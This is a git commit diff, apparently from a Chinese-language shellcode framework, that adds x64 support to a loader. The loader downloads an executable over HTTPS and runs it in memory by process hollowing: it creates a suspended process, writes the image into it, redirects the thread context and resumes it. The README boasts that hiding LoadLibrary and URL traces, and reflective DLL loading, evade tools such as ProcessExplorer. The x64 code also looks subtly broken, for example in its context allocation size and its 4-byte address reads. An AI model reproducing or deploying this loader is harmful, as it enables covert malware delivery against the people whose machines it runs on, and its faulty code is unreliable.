添加x64支持
This commit is contained in:
parent
f2a79f5e05
commit
12a917c5db
Binary file not shown.
|
@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
|
||||||
|
|
||||||
int _tmain(int argc, _TCHAR* argv[])
|
int _tmain(int argc, _TCHAR* argv[])
|
||||||
{
|
{
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -159,6 +159,11 @@
|
||||||
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
<AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="api.h" />
|
<ClInclude Include="api.h" />
|
||||||
<ClInclude Include="hash.h" />
|
<ClInclude Include="hash.h" />
|
||||||
|
|
|
@ -1,10 +1,15 @@
|
||||||
#include "ShellCode.h"
|
#include "ShellCode.h"
|
||||||
|
|
||||||
//加载起始函数,跳转到入口函数
|
//加载起始函数,跳转到入口函数
|
||||||
|
#ifdef _WIN64
|
||||||
|
VOID mmLoaderSCStart(){
|
||||||
|
Strat();
|
||||||
|
#else
|
||||||
VOID _declspec(naked) mmLoaderSCStart()
|
VOID _declspec(naked) mmLoaderSCStart()
|
||||||
{
|
{
|
||||||
|
|
||||||
__asm jmp Strat;
|
__asm jmp Strat;
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
@ -49,7 +54,7 @@ public:
|
||||||
|
|
||||||
|
|
||||||
//提取项目的main文件,StartSCode相当于项目的main函数
|
//提取项目的main文件,StartSCode相当于项目的main函数
|
||||||
void __stdcall StartSCode(char * URL)
|
void __stdcall StartSCode()
|
||||||
{
|
{
|
||||||
|
|
||||||
|
|
||||||
|
@ -62,7 +67,7 @@ public:
|
||||||
|
|
||||||
int size = HttpDownload(host, path, 443, TRUE);
|
int size = HttpDownload(host, path, 443, TRUE);
|
||||||
|
|
||||||
fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
|
||||||
|
|
||||||
RunPortableExecutable();
|
RunPortableExecutable();
|
||||||
|
|
||||||
|
@ -75,15 +80,21 @@ public:
|
||||||
};
|
};
|
||||||
|
|
||||||
//sehllcode入口函数
|
//sehllcode入口函数
|
||||||
void __stdcall Strat(char * URL)
|
void __stdcall Strat()
|
||||||
{
|
{
|
||||||
//由于需要模拟全局变量,所以使用类包裹下
|
//由于需要模拟全局变量,所以使用类包裹下
|
||||||
RmExecute runclass;
|
RmExecute runclass;
|
||||||
|
|
||||||
runclass.StartSCode(URL);
|
runclass.StartSCode();
|
||||||
}
|
}
|
||||||
|
#ifdef _WIN64
|
||||||
|
void mmLoaderSCEnd()
|
||||||
|
{
|
||||||
|
|
||||||
|
#else
|
||||||
void __declspec(naked) mmLoaderSCEnd()
|
void __declspec(naked) mmLoaderSCEnd()
|
||||||
{
|
{
|
||||||
|
|
||||||
__asm int 3;
|
__asm int 3;
|
||||||
|
#endif
|
||||||
}
|
}
|
|
@ -9,7 +9,7 @@
|
||||||
EXTERN_C VOID
|
EXTERN_C VOID
|
||||||
mmLoaderSCStart();//这里用来表明shellcode的开始
|
mmLoaderSCStart();//这里用来表明shellcode的开始
|
||||||
|
|
||||||
void __stdcall Strat(char * URL);//入口函数main
|
void __stdcall Strat();//入口函数main
|
||||||
|
|
||||||
EXTERN_C VOID
|
EXTERN_C VOID
|
||||||
mmLoaderSCEnd();//与开头对应的结尾
|
mmLoaderSCEnd();//与开头对应的结尾
|
|
@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
|
||||||
return dwLast;
|
return dwLast;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#ifdef _WIN64
|
||||||
|
bool RmExecute::RunPortableExecutable() {
|
||||||
|
IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
|
||||||
|
IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
|
||||||
|
IMAGE_SECTION_HEADER* SectionHeader;
|
||||||
|
|
||||||
|
PROCESS_INFORMATION PI;
|
||||||
|
STARTUPINFOA SI;
|
||||||
|
|
||||||
|
CONTEXT* CTX;
|
||||||
|
|
||||||
|
ULONG_PTR* ImageBase; //Base address of the image
|
||||||
|
void* pImageBase; // Pointer to the image base
|
||||||
|
|
||||||
|
int count;
|
||||||
|
char CurrentFilePath[1024];
|
||||||
|
|
||||||
|
DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
|
||||||
|
NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
|
||||||
|
|
||||||
|
GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
|
||||||
|
|
||||||
|
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
|
||||||
|
{
|
||||||
|
ZeroMemory(&PI, sizeof(PI)); // Null the memory
|
||||||
|
ZeroMemory(&SI, sizeof(SI)); // Null the memory
|
||||||
|
|
||||||
|
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
|
||||||
|
CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
|
||||||
|
//process in suspended state, for the new image.
|
||||||
|
{
|
||||||
|
// Allocate memory for the context.
|
||||||
|
CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
|
||||||
|
CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
|
||||||
|
|
||||||
|
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
|
||||||
|
{
|
||||||
|
// Read instructions
|
||||||
|
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
|
||||||
|
|
||||||
|
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
|
||||||
|
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
|
||||||
|
|
||||||
|
// Write the image to the process
|
||||||
|
WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
|
||||||
|
|
||||||
|
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
|
||||||
|
{
|
||||||
|
SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
|
||||||
|
|
||||||
|
WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
|
||||||
|
LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
|
||||||
|
}
|
||||||
|
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
|
||||||
|
LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
|
||||||
|
|
||||||
|
// Move address of entry point to the rax register
|
||||||
|
CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
|
||||||
|
SetThreadContext(PI.hThread, LPCONTEXT(CTX));
|
||||||
|
ResumeThread(PI.hThread);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
#else
|
||||||
bool RmExecute::RunPortableExecutable()
|
bool RmExecute::RunPortableExecutable()
|
||||||
{
|
{
|
||||||
|
|
||||||
|
@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
|
||||||
}
|
}
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
#endif
|
|
@ -2,7 +2,7 @@
|
||||||
|
|
||||||
Remote Download and Memory Execute for shellcode framework
|
Remote Download and Memory Execute for shellcode framework
|
||||||
|
|
||||||
远程下载并内存加载的ShellCode框架,暂不支持X64
|
远程下载并内存加载的ShellCode框架,已经支持x64
|
||||||
|
|
||||||
# 参(抄)考(袭)项目
|
# 参(抄)考(袭)项目
|
||||||
|
|
||||||
|
@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
|
||||||
|
|
||||||
隐藏loadlibrary特征和url特征,更不容易被发现
|
隐藏loadlibrary特征和url特征,更不容易被发现
|
||||||
|
|
||||||
## X64支持
|
|
||||||
|
|
||||||
自行调试`Tool.h->RunPortableExecutable`函数,大概就是加个X64宏把EAX什么换成RAX(应该
|
|
||||||
|
|
||||||
## 反射DLL加载技术
|
## 反射DLL加载技术
|
||||||
|
|
||||||
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化
|
||||||
|
|
Loading…
Reference in New Issue